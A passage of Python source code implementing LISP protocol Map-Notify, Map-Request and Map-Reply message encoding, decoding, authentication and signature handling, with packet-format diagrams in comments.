# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
lcaf_len = socket.htons(len(json_string) + 4)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0, lcaf_len,
json_len)
packet += json_string
packet += struct.pack("H", 0)
return(packet)
#enddef
def encode(self, probe_dest, probe_port):
first_long = (LISP_MAP_REQUEST << 28) | self.record_count
telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
if (telemetry != None): self.itr_rloc_count += 1
first_long = first_long | (self.itr_rloc_count << 8)
if (self.auth_bit): first_long |= 0x08000000
if (self.map_data_present): first_long |= 0x04000000
if (self.rloc_probe): first_long |= 0x02000000
if (self.smr_bit): first_long |= 0x01000000
if (self.pitr_bit): first_long |= 0x00800000
if (self.smr_invoked_bit): first_long |= 0x00400000
if (self.mobile_node): first_long |= 0x00200000
if (self.xtr_id_present): first_long |= 0x00100000
if (self.local_xtr): first_long |= 0x00004000
if (self.dont_reply_bit): first_long |= 0x00002000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
#
# Check if Map-Request is going to be signed. If so, encode json-string
# in source-EID field. Otherwise, just encode source-EID with instance-
# id in source-EID field.
#
encode_sig = False
filename = self.privkey_filename
if (filename != None and os.path.exists(filename)):
f = open(filename, "r"); key = f.read(); f.close()
try:
key = ecdsa.SigningKey.from_pem(key)
except:
return(None)
#endtry
json_string = self.sign_map_request(key)
encode_sig = True
elif (self.map_request_signature != None):
sig = binascii.b2a_base64(self.map_request_signature)
json_string = { "source-eid" : self.source_eid.print_address(),
"signature-eid" : self.signature_eid.print_address(),
"signature" : sig }
json_string = json.dumps(json_string)
encode_sig = True
#endif
if (encode_sig):
packet += self.encode_json(json_string)
else:
if (self.source_eid.instance_id != 0):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.source_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.source_eid.afi))
packet += self.source_eid.pack_address()
#endif
#endif
#
# For RLOC-probes, see if keys already negotiated for RLOC. If so,
# use them so a new DH exchange does not happen.
#
if (probe_dest):
if (probe_port == 0): probe_port = LISP_DATA_PORT
addr_str = probe_dest.print_address_no_iid() + ":" + \
str(probe_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]
#endif
#endif
#
# If security is enabled, put security parameters in the first
# ITR-RLOC.
#
for itr in self.itr_rlocs:
if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
if (self.keys == None or self.keys[1] == None):
keys = lisp_keys(1)
self.keys = [None, keys, None, None]
#endif
keys = self.keys[1]
keys.add_key_by_nonce(self.nonce)
packet += keys.encode_lcaf(itr)
else:
packet += struct.pack("H", socket.htons(itr.afi))
packet += itr.pack_address()
#endif
#endfor
#
# Add telemetry, if configured and this is an RLOC-probe Map-Request.
#
if (telemetry != None):
ts = str(time.time())
telemetry = lisp_encode_telemetry(telemetry, io=ts)
self.json_telemetry = telemetry
packet += self.encode_json(telemetry)
#endif
mask_len = 0 if self.target_eid.is_binary() == False else \
self.target_eid.mask_len
subscribe = 0
if (self.subscribe_bit):
subscribe = 0x80
self.xtr_id_present = True
if (self.xtr_id == None):
self.xtr_id = random.randint(0, (2**128)-1)
#endif
#endif
packet_format = "BB"
packet += struct.pack(packet_format, subscribe, mask_len)
if (self.target_group.is_null() == False):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_sg(self.target_group)
elif (self.target_eid.instance_id != 0 or
self.target_eid.is_geo_prefix()):
packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
packet += self.target_eid.lcaf_encode_iid()
else:
packet += struct.pack("H", socket.htons(self.target_eid.afi))
packet += self.target_eid.pack_address()
#endif
#
# If this is a subscription request, append xTR-ID to end of packet.
#
if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
return(packet)
#enddef
def lcaf_decode_json(self, packet):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)
#
# Do lcaf-length and json-length checks first.
#
lcaf_len = socket.ntohs(lcaf_len)
json_len = socket.ntohs(json_len)
packet = packet[format_size::]
if (len(packet) < lcaf_len): return(None)
if (lcaf_len != json_len + 2): return(None)
#
# Pull out JSON string from packet.
#
json_string = packet[0:json_len]
packet = packet[json_len::]
#
# If telemetry data in the JSON, do not need to convert to dict array.
#
if (lisp_is_json_telemetry(json_string) != None):
self.json_telemetry = json_string
#endif
#
# Get JSON encoded afi-address in JSON, we are expecting AFI of 0.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0): return(packet)
if (self.json_telemetry != None): return(packet)
#
# Convert string to dictionary array.
#
try:
json_string = json.loads(json_string)
except:
return(None)
#endtry
#
# Store JSON data internally.
#
if (json_string.has_key("source-eid") == False): return(packet)
eid = json_string["source-eid"]
afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
eid.count(":") == 7 else None
if (afi == None):
lprint("Bad JSON 'source-eid' value: {}".format(eid))
return(None)
#endif
self.source_eid.afi = afi
self.source_eid.store_address(eid)
if (json_string.has_key("signature-eid") == False): return(packet)
eid = json_string["signature-eid"]
if (eid.count(":") != 7):
lprint("Bad JSON 'signature-eid' value: {}".format(eid))
return(None)
#endif
self.signature_eid.afi = LISP_AFI_IPV6
self.signature_eid.store_address(eid)
if (json_string.has_key("signature") == False): return(packet)
sig = binascii.a2b_base64(json_string["signature"])
self.map_request_signature = sig
return(packet)
#enddef
def decode(self, packet, source, port):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.auth_bit = True if (first_long & 0x08000000) else False
self.map_data_present = True if (first_long & 0x04000000) else False
self.rloc_probe = True if (first_long & 0x02000000) else False
self.smr_bit = True if (first_long & 0x01000000) else False
self.pitr_bit = True if (first_long & 0x00800000) else False
self.smr_invoked_bit = True if (first_long & 0x00400000) else False
self.mobile_node = True if (first_long & 0x00200000) else False
self.xtr_id_present = True if (first_long & 0x00100000) else False
self.local_xtr = True if (first_long & 0x00004000) else False
self.dont_reply_bit = True if (first_long & 0x00002000) else False
self.itr_rloc_count = ((first_long >> 8) & 0x1f)
self.record_count = first_long & 0xff
self.nonce = nonce[0]
#
# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
itr_rloc_count = self.itr_rloc_count + 1
while (itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = afi
#
# We may have telemetry in the ITR-RLOCs. Check here to avoid
# security key material logic.
#
if (itr.afi == LISP_AFI_LCAF):
orig_packet = packet
json_packet = packet[format_size::]
packet = self.lcaf_decode_json(json_packet)
if (packet == json_packet): packet = orig_packet
#endif
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
elif (self.json_telemetry == None):
#
# Decode key material if we found no telemetry data.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
